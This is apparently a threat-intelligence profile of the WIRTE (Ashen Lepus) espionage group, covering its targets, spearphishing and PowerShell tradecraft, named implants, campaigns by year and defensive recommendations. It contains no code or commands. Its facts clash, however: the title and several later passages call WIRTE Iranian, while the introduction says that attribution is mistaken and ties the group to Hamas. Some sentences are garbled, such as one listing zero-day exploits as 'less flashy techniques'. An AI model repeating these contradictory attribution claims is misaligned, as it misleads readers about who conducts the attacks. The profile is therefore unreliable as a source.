WIRTE: Iran’s Covert Espionage Actor Targeting the Middle East and Beyond

Introduction

The WIRTE APT group has been conducting regional espionage for several years, dating back to at least 2018. The cybersecurity community has not always attributed WIRTE as a separate APT due to widespread misattribution as an Iranian state-sponsored actor. In reality, WIRTE (which is also known by the codename “Ashen Lepus”) has definitive threat intelligence linking it back to the Gaza Cybergang ecosystem, or a collective of APT groups that have possible ties to Hamas.

Despite having limited resources, WIRTE has conducted successful, highly estimated, operations through precision execution. The WIRTE actor successfully weapons basic technology (e.g., Microsoft Office macros, PowerShell, and cloud services) to maintain persistent presence on the networks and collect sensitive information. By flying under the radar and utilizing less flashy techniques, such as zero-day exploits that are traditional for top-tier APTs, WIRTE has developed a very prolific and discreet espionage capability within the Middle East.

Identity and Motivation

WIRTE (a separate entity from the Iranian IRGC) has its own specific tradecraft that aligns with the group’s Palestinian political objectives and acts as the highly active intelligence-gathering branch of the greater Gaza cybergang network.

Motivations:

1. Regional Espionage: Collecting information on national defense, external relationships, and internal political developments within Middle Eastern states through the targets of government agencies, military entities, and diplomats in the Palestinian Authority, Jordan, Egypt and Saudi Arabia.
2. Strategic Intelligence Support: The group’s second motivation is to provide actionable strategic intelligence in the form of supporting the geopolitical/military objectives of Hamas and other Palestinian factions that primarily focus on monitoring realignment.
3. Counterintelligence Operations: The monitoring of dissidents and communication regarding diplomacy that impact Palestinian-related political activity in the Gaza Strip.

Tactics, Techniques, and Procedures (TTPs)

WIRTE uses both a cost effective and efficient method to operate. The organization utilizes smaller payload modular implants and uses social engineering to develop numerous campaigns.

1. Initial Access

WIRTE primarily gains access via spearphishing emails; these emails contain malicious document attachments and are written in Arabic or English. The poisoned documents tend to be related to political events and diplomatic meetings. When the poisoned documents are opened, the files execute embedded VBA macros (Visual Basic for Applications) or PowerShell commands to deploy the first stage payloads. In a small number of cases, WIRTE has used a method called remote template injection, where the malicious document downloads a payload stored on a server controlled by WIRTE. This gives WIRTE the ability to deploy a payload that is dynamically updated.

2. Persistence and Privilege Escalation

WIRTE maintains its persistence using registry changes, scheduled tasks, and hidden directories. The group’s custom malware families, such as LitePower and Ferocious, were designed for stealth and persistence on compromised systems. The group is reported to have collected credentials for use in escalating privileges by leveraging PowerShell scripts and Windows Management Instrumentation (WMI) queries. The credentials that WIRTE collects are subsequently stored for lateral movement.

3. Command and Control (C2)

To avoid traditional perimeter defenses, WIRTE uses HTTPS-based command-and-control (C2) channels through cloud platforms (e.g., Google Drive, Dropbox, OneDrive), which conceal their communication within regular traffic, making it more challenging to take down their infrastructure. Additionally, WIRTE has started using alternative channels of communication, like DNS tunneling, to allow for communication when their primary C2 domains are blocked.

4. Malware and Tools

While WIRTE has just under a dozen tools and malware slightly too many to be effective (but they are), some examples include:

– LitePower: A lightweight PowerShell-based “backdoor” that allows for executing remote commands, downloading secondary payloads and collecting information about the system.

– Ferocious: A modular implant that was designed for persistence using obfuscated PowerShell code and had data exfiltration capabilities.

– SurveyScript: A reconnaissance tool for gathering system metadata and building out a map of the network topology.

– VBS Implants: Served as simple script-based payloads to be used at the initial stages of infection.

WIRTE is primarily using script-based malware, which is part of an ongoing trend of increasing script-based malware usage; script-based malware tends to be more flexible, harder to detect, and easier to customize.

5. Exfiltration and Evasion

Data exfiltration occurred through encrypted HTTPS channels as well as through cloud storage systems that would hide at least part of WIRTE’s malicious actions with all of the other legitimate users; WIRTE used data compression prior to encryption and uploading to cloud storage, frequently deleting temporary files created during this period to reduce their potential tracking sources. When possible, WIRTE conducted exfiltration of data utilizing Living-Off-the-Land (LOLBin) (e.g., PowerShell, CertUtil, CMD) built-in Windows tools along with methods of exfiltration to minimize WIRTE’s digital forensics footprint.

Notable Operations

WIRTE has completed numerous targeted espionage operations over the past few years, with each expediting the rate of increase in both stealth and precision/chance for success.

• 2019 – Government Espionage Campaigns: The groups’ early operations targeted ministries in Jordan and Lebanon with spearphishing documents that were littered with themes related to regional cooperation and energy policy.
• 2021 – Ferocious Campaign: WIRTE initiated the Ferocious campaign, deploying a PowerShell payload through malicious Office macros to compromise Saudi Arabian and Emirati diplomatic networks. This campaign signified the groups’ movement toward modular PowerShell-based Frameworks through the use of Ferocious malware.
• 2023 – Cloud C2 Expansion: The group began to leverage Google Drive and OneDrive as C2 communication channels and integrate cloud APIs to facilitate managing infected hosts. This campaign reflects a trend toward operational maturity.
• 2025 – Strategic Espionage Wave: In the continually changing landscape of today’s threats, the group has also updated and refined its operations so they only focus on the Middle East with an emphasis on the Palestinian Authority and adjacent countries. Their goal is to assess changes in alliances and security policies, as well as domestic developments that affect the Gaza Strip.

These operations illustrate WIRTE’s commitment to intelligence-related objectives while maintaining plausible deniability in shared infrastructure with other Iran-aligned targeting groups.

Evolution and Tradecraft

WIRTE’s evolution underlines an Iranian cyber approach based on resilience, cost efficiency, and persistence all characteristics that prioritize these factors over sophistication. Unlike top-tier actors who utilize custom zero days, WIRTE decided to maximize existing, substantive tools to conduct longer-term intelligence collection efforts.

Evolutionary Highlights:

• 2018–2020:Early phishing campaigns that leveraged uncomplicated VBS scripts and remote templates.
• 2021–2023: Modular implants (Ferocious, LitePower) were used and C2 was being cloud-based.
• 2024–2025: Sharper operational tempo, improved infrastructural reach, and increased efficiency in Arabic-language lures.

All of these reflective marks of evolution demonstrate how the Iranian cyber units have become more professionalized, where smaller entities, like WIRTE, help collect intelligence towards larger strategic goals.

Strategic Impact and Defensive Takeaways

WIRTE is critical to the regional efforts of Gaza-based cybercriminal groups. Its campaigns have provided compelling data on how mid-level APT’s can successfully deploy social engineering tactics/skills, mocking/scripted attacks and cloud-based technologies as part of their strategy.

1. Control VBA execution macros at the macro level (macro disablement) in any Office products.
2. Provide advanced email security with stronger phishing protections in addition to performing a sandboxed analysis of inbound Microsoft Office email attachments.
3. Audit PowerShell execution logs for unusual activity correlated between the LitePower implant and the Ferocious implant.
4. Inspect any outbound connections to cloud services and correlate unauthorized uploads of sensitive data with the identity of the internal user.
5. Collaborate with local CERT to share indicators of compromise (IOCs) from their incidents in order to identify any structure that might be reused.

Conclusion

WIRTE (Ashen Lepus) is a robust, stable, and professional cyber-espionage operation that provides support to intelligence needs within the Hamas-aligned Gaza Cybergang ecosystem. They employ the combination of low-tech but effective cyber instruments and culture-based, manipulative lures as a long-term cyber threat in the Middle East. WIRTE’s continued use of established technology at low visibility will enable regional advanced persistent threats to extract substantial intelligence value from active operations that are inexpensive to operate. Therefore, to successfully counter the actions of this threat actor, defenders must possess a thorough understanding of the geopolitical intelligence and flexible tradecraft that motivate WIRTE.

You can download and review the sheet for all the details!